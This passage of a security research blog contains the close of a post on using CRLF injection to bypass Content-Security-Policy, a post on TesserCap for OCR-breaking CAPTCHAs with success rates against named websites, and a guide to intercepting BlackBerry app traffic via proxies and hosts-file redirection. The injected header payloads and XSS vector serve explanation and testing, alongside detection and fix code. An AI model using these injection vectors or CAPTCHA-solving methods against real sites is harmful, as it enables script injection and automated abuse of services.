<b>Content:</b><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">alert('XSS')</span><br />
<br />
<br />
<b>CRLF Injection and CSP:</b><br />
If an HTTP response contains the same HTTP header multiple times, browsers interpret it differently: some honour the first occurrence of the header, others the last one. Hence, the position of the CSP header (X-Content-Security-Policy) in the application response can play an interesting role. In the discussion below, we assume that the web application implements CSP and is vulnerable to CRLF injection:<br />
<br />
<b>Case 1:</b> <b><i>Attack vector is returned before the CSP header in the HTTP response headers: </i></b><br />
<b>Case 1a:</b> If the browser picks the first occurrence of the CSP header, CRLF injection can be used to insert a CSP header with the following attack vector:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow *</span><br />
<br />
In this case, the web browser interprets the first (injected) CSP header and will happily retrieve content from any malicious URL.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrrB59_FWGLSc7vba6DozX_9X0-IvWjWqulWF7obFvkBfjDatrSKtBaNJSU_Dl3ukgaPmHACmQ4oFZ1-NyPEDftljvITHabduYPwXuJf_ZVyhPldq9asd_2aMtnnWZ9j7w8XiBfI7KTCd/s1600/csp--1st.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrrB59_FWGLSc7vba6DozX_9X0-IvWjWqulWF7obFvkBfjDatrSKtBaNJSU_Dl3ukgaPmHACmQ4oFZ1-NyPEDftljvITHabduYPwXuJf_ZVyhPldq9asd_2aMtnnWZ9j7w8XiBfI7KTCd/s400/csp--1st.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Image shows malicious CSP directive inserted before the legitimate header </span></td></tr>
</tbody></table><br />
<b>Case 1b:</b> If the browser picks the last occurrence of the CSP header, the following CRLF injection attack vector can be used to insert a custom CSP header.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow *%0d%0a%0d%0a</span><br />
<br />
The two trailing CRLF sequences terminate the header block early and push the legitimate CSP header into the response body, where it is no longer interpreted as a header. This again allows an attacker to bypass the CSP protection and source and execute arbitrary content.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZT_ibxSJ4paYe3pDzqCeYS09SP7mIMLS-fBlwdKaAQrvvJP0Bt3CDC1HRY4jou4EFw4_8DbTYqplc31DosJQKLN6o9gSQ45dfCFeIsBs3JI2YUc1CveCLLmHRYKqaXcgeUGfAwe_LBx4d/s1600/x--content--pushed--out.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZT_ibxSJ4paYe3pDzqCeYS09SP7mIMLS-fBlwdKaAQrvvJP0Bt3CDC1HRY4jou4EFw4_8DbTYqplc31DosJQKLN6o9gSQ45dfCFeIsBs3JI2YUc1CveCLLmHRYKqaXcgeUGfAwe_LBx4d/s400/x--content--pushed--out.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Image shows CSP directive pushed out to response body and rendered ineffective </span></td></tr>
</tbody></table><br />
<b>Case 2: <i>Attack vector is returned after the CSP header in the HTTP response headers </i></b><br />
<b>Case 2a:</b> If the browser picks the first occurrence of the CSP header, the CSP directive cannot be overridden for the current resource. For an attack to function, one has to look into the possibility of exploiting HTTP Response Splitting.<br />
<br />
<b>Case 2b:</b> If the browser picks the last occurrence of the CSP header, CRLF injection can be used to insert a malicious header, similar to case 1a.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">lang=en_US%0d%0aX-Content-Security-Policy: allow *</span><br />
<br />
This causes the browser to apply the injected <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">allow *</span> policy and retrieve content from arbitrary URLs.<br />
<br />
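As an added example, not part of the original post, the Ruby below models the two header orderings discussed in cases 1a and 1b: a constructed page reflects the <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">lang</span> parameter into a hypothetical Content-Language header and then emits its CSP header, the two attack vectors from above are run through it, and a small response parser shows what a defender can detect (duplicate CSP headers, or the legitimate header displaced into the body) and how the fix looks (refusing CR/LF in any header value). The <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">allow 'self'</span> policy, the Content-Language header and all function names are constructed for this illustration.

```ruby
require 'uri'

# Header name used in the post (the pre-standard Firefox CSP header).
CSP_HEADER = 'X-Content-Security-Policy'
LEGIT_CSP  = "#{CSP_HEADER}: allow 'self'" # constructed legitimate policy

# The two attack vectors from cases 1a and 1b, URL-decoded as the server sees them.
VECTOR_1A = URI.decode_www_form_component('en_US%0d%0aX-Content-Security-Policy: allow *')
VECTOR_1B = URI.decode_www_form_component('en_US%0d%0aX-Content-Security-Policy: allow *%0d%0a%0d%0a')

# Vulnerable emitter (constructed): the lang parameter is copied into a header
# verbatim, and the legitimate CSP header is written after it (case 1 ordering).
def build_response_unsafe(lang)
  "HTTP/1.1 200 OK\r\nContent-Language: #{lang}\r\n#{LEGIT_CSP}\r\n\r\nok"
end

class HeaderInjection < StandardError; end

# Hardened emitter: a header value may never contain CR or LF.
def build_response_safe(lang)
  raise HeaderInjection, 'CR/LF in header value' if lang =~ /[\r\n]/
  build_response_unsafe(lang)
end

# Splits a raw response into a {name => [values]} hash and the body. The first
# blank line ends the header block, exactly as a browser would see it.
def split_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  headers = Hash.new { |h, k| h[k] = [] }
  head.split("\r\n").drop(1).each do |line| # drop the status line
    name, value = line.split(':', 2)
    headers[name.strip.downcase].push(value.to_s.strip)
  end
  [headers, body.to_s]
end

# Detection: exactly one CSP header in the header block is the only healthy state.
def csp_status(raw)
  headers, body = split_response(raw)
  csp = headers[CSP_HEADER.downcase]
  return :duplicate_csp if csp.length > 1                   # case 1a: browser-dependent pick
  return :csp_pushed_to_body if body.include?(CSP_HEADER)    # case 1b: legitimate header in body
  csp.empty? ? :no_csp : :single_csp
end

if __FILE__ == $PROGRAM_NAME
  p csp_status(build_response_unsafe('en_US'))   # :single_csp
  p csp_status(build_response_unsafe(VECTOR_1A)) # :duplicate_csp
  p csp_status(build_response_unsafe(VECTOR_1B)) # :csp_pushed_to_body
  begin
    build_response_safe(VECTOR_1B)
  rescue HeaderInjection => e
    puts "rejected: #{e.message}"
  end
end
```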
It was observed that when more than one X-Content-Security-Policy header was received by Firefox (7.0.1), it securely defaulted to a same-origin policy for all content. <br />
<br />
The PoC below therefore pushes the legitimate header out to the response body with two CRLF sequences to achieve script execution.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBbGaeyy1bgp-iuSnP93CLVv5ipWZnnmRWbmg83D8256mt7QVr4HWgL9YI79SVq1e4ovfCSmGghJOYhsFXBPswWFA-fmYd-iIwKEIJ1BcjUnhwmnTAwDcnDSXNcGIsFKR8RUX6cWtg49y/s1600/no--xss--csp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBbGaeyy1bgp-iuSnP93CLVv5ipWZnnmRWbmg83D8256mt7QVr4HWgL9YI79SVq1e4ovfCSmGghJOYhsFXBPswWFA-fmYd-iIwKEIJ1BcjUnhwmnTAwDcnDSXNcGIsFKR8RUX6cWtg49y/s400/no--xss--csp.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Image shows script execution prevented from a different origin (http://localhost:3333)</span></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nyz48qjAUmBDlm2qv9aGWvH7N27qmCm0C05TJWT8QJ3RQ_wHBDKTGtVKFG9861W53QZDquDo71J3jKNuJevEMimQHBtZj9XJh6KNt5TEMt1OOELxZLru_8Z8VOh_U1zGRrvLSdu1Abzr/s1600/xss--successful--2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nyz48qjAUmBDlm2qv9aGWvH7N27qmCm0C05TJWT8QJ3RQ_wHBDKTGtVKFG9861W53QZDquDo71J3jKNuJevEMimQHBtZj9XJh6KNt5TEMt1OOELxZLru_8Z8VOh_U1zGRrvLSdu1Abzr/s400/xss--successful--2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "Calibri", sans-serif; font-size: 11pt; line-height: 115%;">Image shows successful script execution when the page was vulnerable to CRLF injection</span></td></tr>
</tbody></table><br />
<br />
</div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-31990828455089007742011-11-17T06:57:00.000-08:002012-12-31T12:00:06.038-08:00CAPTCHA Hax With TesserCap<div dir="ltr" style="text-align: left;" trbidi="on">
This blog post was voted 8th in the <a href="https://blog.whitehatsec.com/vote-now-top-ten-web-hacking-techniques-of-2011/" target="_blank">Top 10 Web Hacking Techniques of 2011</a> poll.<br />
<br />
With the goal of creating a tool that helps security professionals and developers test their CAPTCHA schemes, I conducted research on over 200 high-traffic websites and several CAPTCHA service providers listed in <a href="http://www.quantcast.com/top-sites-1">Quantcast’s Top 1 Million Ranking Websites</a>. <br />
<br />
During the same time frame, students at Stanford University also conducted similar <a href="http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf">research (PDF)</a>. Both research works concluded the obvious:<br />
<br />
<b>An alarming number of CAPTCHAs schemes are vulnerable to automated attacks.</b><br />
<br />
I looked around, tested and zeroed in on Tesseract-OCR as my OCR engine. To remove color complexities, spatial irregularities, and other types of random noise from CAPTCHAs, I decided to write my own image preprocessing engine. After a few months of research, coding and testing in my spare time, TesserCap was born and is now ready for release. <br />
<br />
TesserCap is a GUI-based, point-and-shoot CAPTCHA analysis tool with the following features: <br />
<ol>
<li>A generic image preprocessing engine that can be configured for the CAPTCHA type being analyzed. </li>
<li>Tesseract-OCR as its OCR engine to retrieve text from preprocessed CAPTCHAs. </li>
<li>Web proxy support</li>
<li>Support for custom HTTP headers to retrieve CAPTCHAs from websites that require cookies or special HTTP headers in requests</li>
<li>CAPTCHA statistical analysis support</li>
<li>Character set selection for the OCR Engine</li>
</ol>
An example of TesserCap's image preprocessing and a run against Wikipedia (Wikimedia’s Fancy CAPTCHA) is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpj6vnjbvGiBSxoYeHWxndVfrmcRRDxY0cG3AHciMszEn_gE1Y8BmfzYWDyx2kZ_oiGmMl2XJegx3mwsQxY7KDnTpG20E9e0yI7pUrPd4WtzeSjp6qSwYVUw8w3Y_aKsMcrcvfXQPZlSA/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpj6vnjbvGiBSxoYeHWxndVfrmcRRDxY0cG3AHciMszEn_gE1Y8BmfzYWDyx2kZ_oiGmMl2XJegx3mwsQxY7KDnTpG20E9e0yI7pUrPd4WtzeSjp6qSwYVUw8w3Y_aKsMcrcvfXQPZlSA/s320/p1.png" width="320" /></a></div>
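<br />
As an added example (not TesserCap's code), two of the generic preprocessing steps such an engine applies before handing an image to the OCR engine, run on a constructed 12-row by 8-column grayscale bitmap: thresholding to a black-and-white image, then dropping isolated dark pixels (salt noise) that have no dark 8-neighbour. The column profile at the end is the vertical projection a segmenter uses to locate character boundaries. The sample pixels, the threshold of 128 and the neighbour count of 1 are all assumed values chosen for this example.<br />

```ruby
# Constructed sample: 12 rows x 8 columns, 0 = black, 255 = white. The digit
# "1" is dark, the background is light with slight variation, and three
# isolated dark "salt" pixels were sprinkled in at (1,1), (6,0) and (9,7).
SAMPLE = [
  [250, 240, 235, 250, 255, 245, 250, 240],
  [240,  40, 250,  60,  30, 250, 250, 245],
  [250, 245, 240, 250,  30, 245, 250, 240],
  [245, 250, 235, 250,  35, 240, 250, 250],
  [250, 240, 250, 245,  30, 250, 245, 240],
  [240, 250, 245, 250,  40, 245, 250, 250],
  [ 50, 245, 250, 240,  30, 250, 245, 240],
  [250, 240, 245, 250,  35, 245, 250, 250],
  [245, 250, 240, 250,  30, 250, 240, 245],
  [250, 245, 250, 240,  30, 245, 250,  45],
  [240, 250, 245,  30,  30,  30, 245, 250],
  [250, 240, 250, 245, 250, 240, 250, 245],
]

# Step 1: threshold to a 0/1 bitmap (1 = ink). The threshold is the kind of
# per-CAPTCHA tuning knob a preprocessing engine exposes; 128 suits this sample.
def binarize(gray, threshold = 128)
  gray.map { |row| row.map { |v| v < threshold ? 1 : 0 } }
end

# Number of ink pixels among the 8 neighbours of (r, c); edges are clipped.
def set_neighbors(bits, r, c)
  count = 0
  (-1..1).each do |dr|
    (-1..1).each do |dc|
      next if dr.zero? && dc.zero?
      rr, cc = r + dr, c + dc
      next if rr < 0 || cc < 0 || rr >= bits.size || cc >= bits[rr].size
      count += bits[rr][cc]
    end
  end
  count
end

# Step 2: despeckle. Keep an ink pixel only if at least min_neighbors of its
# 8 neighbours are ink too; isolated dots vanish, connected strokes survive.
def remove_isolated(bits, min_neighbors = 1)
  bits.each_with_index.map do |row, r|
    row.each_with_index.map do |v, c|
      v == 1 && set_neighbors(bits, r, c) >= min_neighbors ? 1 : 0
    end
  end
end

# Vertical projection: ink pixels per column. Runs of non-zero columns
# separated by zero columns are the character boundaries a segmenter uses.
def column_profile(bits)
  bits.transpose.map(&:sum)
end

def preprocess(gray, threshold: 128, min_neighbors: 1)
  remove_isolated(binarize(gray, threshold), min_neighbors)
end

# ASCII rendering for eyeballing the result.
def render(bits)
  bits.map { |row| row.map { |v| v == 1 ? '#' : '.' }.join }.join("\n")
end

if __FILE__ == $0
  puts render(binarize(SAMPLE)), "", render(preprocess(SAMPLE))
  p column_profile(preprocess(SAMPLE)) # [0, 0, 0, 2, 10, 1, 0, 0]
end
```

Before despeckling the column profile reports ink in columns 0, 1 and 7 that belong to no glyph; after it only the three columns of the "1" remain, which is what lets a segmenter hand the OCR engine one clean character at a time.<br />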
<br />
<br />
<h1>
Downloads</h1>
TesserCap and its user manual can be downloaded from one of the following locations:<br />
<ul>
<li><a href="http://www.opensecurityresearch.com/files/tessercap.zip">http://www.opensecurityresearch.com/files/tessercap.zip</a> -- No password protection on this zip file</li>
<li><a href="http://www.mcafee.com/us/downloads/free-tools/tessercap.aspx">http://www.mcafee.com/us/downloads/free-tools/tessercap.aspx</a> -- Use the password "foundstone" (without quotes) to extract this zip file.</li>
</ul>
<h1>
Results</h1>
The two tables below summarize the CAPTCHA analysis performed using TesserCap on a few popular websites and some CAPTCHA service providers. All tests used TesserCap’s image preprocessing module and Tesseract-OCR’s default training data.<br />
<br />
<br />
<br />
<br />
<br />
<center>
<br />
<br />
<table border="1"><tbody>
<tr> <td><b>Website</b></td> <td><b>Accuracy*</b></td> <td><b>Quantcast Rank</b></td> </tr>
<tr> <td>wikipedia</td> <td>20-30%</td> <td>7</td> </tr>
<tr> <td>ebay</td> <td>20-30%</td> <td>11</td> </tr>
<tr> <td>reddit.com</td> <td>20-30%</td> <td>68</td> </tr>
<tr> <td>CNBC</td> <td>50+%</td> <td>121</td> </tr>
<tr> <td>foodnetwork.com</td> <td>80-90%</td> <td>160</td> </tr>
<tr> <td>dailymail.co.uk</td> <td>30+%</td> <td>245</td> </tr>
<tr> <td>megaupload.com </td> <td>80+%</td> <td>1000</td> </tr>
<tr> <td>pastebin.com</td> <td>70-80%</td> <td>32,534</td> </tr>
<tr> <td>cavenue.com</td> <td>80+%</td> <td>149,645</td> </tr>
</tbody></table>
<br />
<br />
<br />
<br />
<table border="1"><tbody>
<tr> <td><b>CAPTCHA Provider</b></td> <td><b>Accuracy*</b></td> </tr>
<tr> <td>captchas.net</td> <td>40-50%</td> </tr>
<tr> <td>opencaptcha.com</td> <td>20-30%</td> </tr>
<tr> <td>snaphost.com</td> <td>60+%</td> </tr>
<tr> <td>captchacreator.com</td> <td>10-20%</td> </tr>
<tr> <td>www.phpcaptcha.org</td> <td>10-20%</td> </tr>
<tr> <td>webspamprotect.com</td> <td>40+%</td> </tr>
<tr> <td>ReCaptcha</td> <td>0%</td> </tr>
</tbody></table>
</center>
<br />
<br />
<br />
*This accuracy may be further increased by training the Tesseract-OCR engine on the CAPTCHAs under test.<br />
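<br />
As an added example (not TesserCap's code), the figures a CAPTCHA statistical analysis feature produces, computed over a constructed set of OCR runs: accuracy as reported in the tables above, the duplicate rate and per-character distribution that the "Breaking A Weak CAPTCHA implementation" post further down reports for its target, and the position-wise OCR confusions that motivate restricting the OCR engine's character set. The run data is constructed and TesserCap's own output format is not reproduced.<br />

```ruby
# Constructed OCR runs: each pair is (text the CAPTCHA actually showed,
# text the OCR engine returned).
RUNS = [
  ["4521", "4521"], ["7845", "7845"], ["5544", "5S44"], ["9041", "9041"],
  ["4521", "4521"], ["3458", "3458"], ["2645", "26A5"], ["5487", "5487"],
  ["1954", "1954"], ["4521", "4S21"],
]

# Fraction of CAPTCHAs solved exactly (the "Accuracy" column above).
def accuracy(runs)
  runs.count { |truth, ocr| truth == ocr }.fdiv(runs.size)
end

# Fraction of issued CAPTCHAs that repeat an earlier one. A non-zero rate
# means a replay dictionary of previously seen solutions is viable.
def duplicate_rate(issued)
  (issued.size - issued.uniq.size).fdiv(issued.size)
end

# Character frequency across all issued CAPTCHAs, most common first.
# A skewed distribution shrinks the effective search space for guessing.
def char_distribution(issued)
  counts = issued.join.each_char.each_with_object(Hash.new(0)) { |ch, h| h[ch] += 1 }
  counts.sort_by { |ch, n| [-n, ch] }.to_h
end

# Position-wise OCR misreads, e.g. ["5", "S"] => 2. Letters that never occur
# in the real CAPTCHA are candidates for removal from the OCR character set.
def confusions(runs)
  runs.each_with_object(Hash.new(0)) do |(truth, ocr), h|
    next unless truth.size == ocr.size
    truth.chars.zip(ocr.chars).each { |t, o| h[[t, o]] += 1 if t != o }
  end
end

def report(runs)
  issued = runs.map(&:first)
  {
    accuracy: accuracy(runs),
    duplicate_rate: duplicate_rate(issued),
    charset: issued.join.chars.uniq.sort,
    distribution: char_distribution(issued),
    confusions: confusions(runs),
  }
end

if __FILE__ == $0
  report(RUNS).each { |key, value| puts "#{key}: #{value.inspect}" }
end
```

On this sample every OCR miss is a digit read as a look-alike letter; the observed charset is digits only, so restricting the OCR engine to 0-9 would lift the 70% raw accuracy to 100% without any retraining.<br />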
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">Wikipedia</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazLc-ZHQx6cIieFTw1ZPqAeXY68tlBx-olwcdUBzxSiYKEIUUEjcgfGyZrDaFD5ZHZ6PUOy1Trh2LQCHjv1n-lRFMTDR1VMClo10EVC2kpgNbYR7FE_ubS5R410ZuViKD64-t35vQwC8/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgazLc-ZHQx6cIieFTw1ZPqAeXY68tlBx-olwcdUBzxSiYKEIUUEjcgfGyZrDaFD5ZHZ6PUOy1Trh2LQCHjv1n-lRFMTDR1VMClo10EVC2kpgNbYR7FE_ubS5R410ZuViKD64-t35vQwC8/s320/p2.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">OpenCaptcha Preprocessing</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQpFzMXPnZ-S0xmQ_qODT5-H1uHILGUglLs_cSkx-2MZZ-Khq77hM-ozhpC3ZI5rdpvSzjLi_Zvi2-xFRWbrqqCJZlt0XzIZbEeHMMDIOI95FyC8FI1Z61uisZLoplQ-cwECDBuq06RK8/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQpFzMXPnZ-S0xmQ_qODT5-H1uHILGUglLs_cSkx-2MZZ-Khq77hM-ozhpC3ZI5rdpvSzjLi_Zvi2-xFRWbrqqCJZlt0XzIZbEeHMMDIOI95FyC8FI1Z61uisZLoplQ-cwECDBuq06RK8/s320/p3.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">OpenCaptcha Sample Run</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXf1EekU6o-UlgGzCRAexQBLjRZSnU61elvfIpuIdzwwxApI6KJ0Ndty2jjKwsuYbS17bcd9HzLgXzoXaChHr2DXM6CuXoLm-vc1fK_SHMhktUd0P6sH7UEd2KpW-IXpEi9eIc-eAvrk/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXf1EekU6o-UlgGzCRAexQBLjRZSnU61elvfIpuIdzwwxApI6KJ0Ndty2jjKwsuYbS17bcd9HzLgXzoXaChHr2DXM6CuXoLm-vc1fK_SHMhktUd0P6sH7UEd2KpW-IXpEi9eIc-eAvrk/s320/p4.png" width="320" /></a></div>
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">Reddit</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnyru4oi0Xk67ieHrKuyQFndqAQ2tjQjKTh2a8QkWydlKbEOL4gsGJPq7w4GEuSGoqj6yA031WNouap7-7ipiNJoOhynkackJy1HHip7YZ8Fl8c2C5pMF_NKy7IcOWbJ-ZST3a0iNwAEU/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnyru4oi0Xk67ieHrKuyQFndqAQ2tjQjKTh2a8QkWydlKbEOL4gsGJPq7w4GEuSGoqj6yA031WNouap7-7ipiNJoOhynkackJy1HHip7YZ8Fl8c2C5pMF_NKy7IcOWbJ-ZST3a0iNwAEU/s320/p5.png" width="320" /></a></div>
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">eBay</span></h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBfJCFQybuQzVHMQLvi8l5jQSPOy-IcQ3ArXj62nN9x1wfS3flziJKu5dkwJNpkyd5SNipbIukh8285EK7hcDDRat6EEpZkUpSmvME9YSEuF_HhpD-qzCguI_mPAysyJ4M80nVljgGl8/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBfJCFQybuQzVHMQLvi8l5jQSPOy-IcQ3ArXj62nN9x1wfS3flziJKu5dkwJNpkyd5SNipbIukh8285EK7hcDDRat6EEpZkUpSmvME9YSEuF_HhpD-qzCguI_mPAysyJ4M80nVljgGl8/s320/p6.png" width="320" /></a></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com13tag:blogger.com,1999:blog-4663432300421783651.post-72970701837750795692011-06-17T00:00:00.000-07:002012-07-05T20:40:43.176-07:00Intercepting Blackberry Application Traffic<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Intercepting mobile traffic is one of the key areas of mobile application penetration testing, and BlackBerry applications are no different. In this post, we will look at methods of intercepting BlackBerry application traffic.<br />
<br />
It is important to note that the standalone BlackBerry device simulator does not offer any mechanism to route HTTP traffic through a web proxy. To use a web proxy for traffic interception, one has to run the BlackBerry device simulator together with the MDS and Email simulator. Assuming you have both installed, the following steps will allow you to intercept BlackBerry web traffic.<br />
<br />
<b>Case 1: Routing HTTP traffic via web proxy:</b><br />
<br />
<ol style="text-align: left;">
<li>Browse to "\Program Files\Research In Motion\BlackBerry Email and MDS Services Simulators #.#.#\MDS\config"</li>
<li>Open the rimpublic.property file</li>
<li>Under the HTTP HANDLER section, add your web proxy configuration information:</li>
</ol>
<div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyEnabled=true</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyHost=<your proxy address></span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyPort=<your proxy port></span></div>
</div>
<br />
The following image shows the HTTP HANDLER section of the rimpublic.property file for Fiddler running on port 8888 on localhost.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTocdj4RtU7ZvDf7O3fgvDGWjbXkV9Bl5rhnzE8kYDCFAcb0Kw8INEgmvcb0J1ntRI9zM2o7ZzoBlPd2S9mdumCRI6sEAGxTz750DlJptH7Rum8DFVknfv2nYruor4MhO_pITSbiIIsbe/s1600/config--file.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTocdj4RtU7ZvDf7O3fgvDGWjbXkV9Bl5rhnzE8kYDCFAcb0Kw8INEgmvcb0J1ntRI9zM2o7ZzoBlPd2S9mdumCRI6sEAGxTz750DlJptH7Rum8DFVknfv2nYruor4MhO_pITSbiIIsbe/s1600/config--file.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Web Proxy Configuration</td></tr>
</tbody></table>
More details on proxy configuration can be found <a href="http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/348583/800738/800792/801079/How_To_-_Configure_the_BlackBerry_MDS_simulator_to_work_behind_a_proxy.html?nodeid=800740&vernum=0">here</a>. Once you save these settings and launch the MDS simulator, you will be able to monitor, intercept and modify all HTTP traffic. However, SSL traffic still needs some extra work.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXUGQT8uF253MbVcZrkCrvKHXEKKeNVJk5beiOLca4NFN5cTKXz9olfE-gTiU5h-Qr1R6mxeX-_yKd2A2VRG6iYf4f9fnqfmPvOtfcx9E3i2w8WlMpMtkfZaPwaSvPQPX-1BIDjKTsy0Z/s1600/google--via--proxy.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXUGQT8uF253MbVcZrkCrvKHXEKKeNVJk5beiOLca4NFN5cTKXz9olfE-gTiU5h-Qr1R6mxeX-_yKd2A2VRG6iYf4f9fnqfmPvOtfcx9E3i2w8WlMpMtkfZaPwaSvPQPX-1BIDjKTsy0Z/s640/google--via--proxy.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows HTTP traffic captured for google.com</td></tr>
</tbody></table>
<br />
<br />
<b>Case 2: Routing HTTPS traffic via web proxy:</b><br />
The above-mentioned configuration did not work for SSL traffic. It was time for a workaround, and I thought of using a reverse proxy. The idea had some limitations, but it worked seamlessly and allowed me to intercept SSL traffic for a particular domain. To demonstrate the concept, I will be using Charles Proxy's reverse proxy; you can use any reverse proxy of your choice. Let's configure the Charles proxy now.<br />
<ol style="text-align: left;">
<li>Identify the domain the application/browser talks to</li>
<li>Resolve that domain to an IP address. nslookup for mail.google.com returned four addresses (74.125.226.184, 74.125.226.182, 74.125.226.181, 74.125.226.183); one of them was chosen as the destination in the reverse proxy settings. See the screenshots below for the Charles reverse proxy settings.</li>
<li>In the hosts file, add an entry that points the target domain at the IP where the reverse proxy is listening. In our case, I entered the following for mail.google.com:<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">127.0.0.1<span class="Apple-tab-span" style="white-space: pre;"> </span>mail.google.com</span></li>
<li>Now launch the browser in the simulator and access https://mail.google.com</li>
<li>The BlackBerry simulator will issue a certificate error (see the screenshot below). Choose the "Trust Certificate" option, provide the certificate store password and save your settings.</li>
<li>All traffic for that domain is now routed via Charles. Enjoy!</li>
</ol>
<div>
<br /></div>
<div style="text-align: left;">
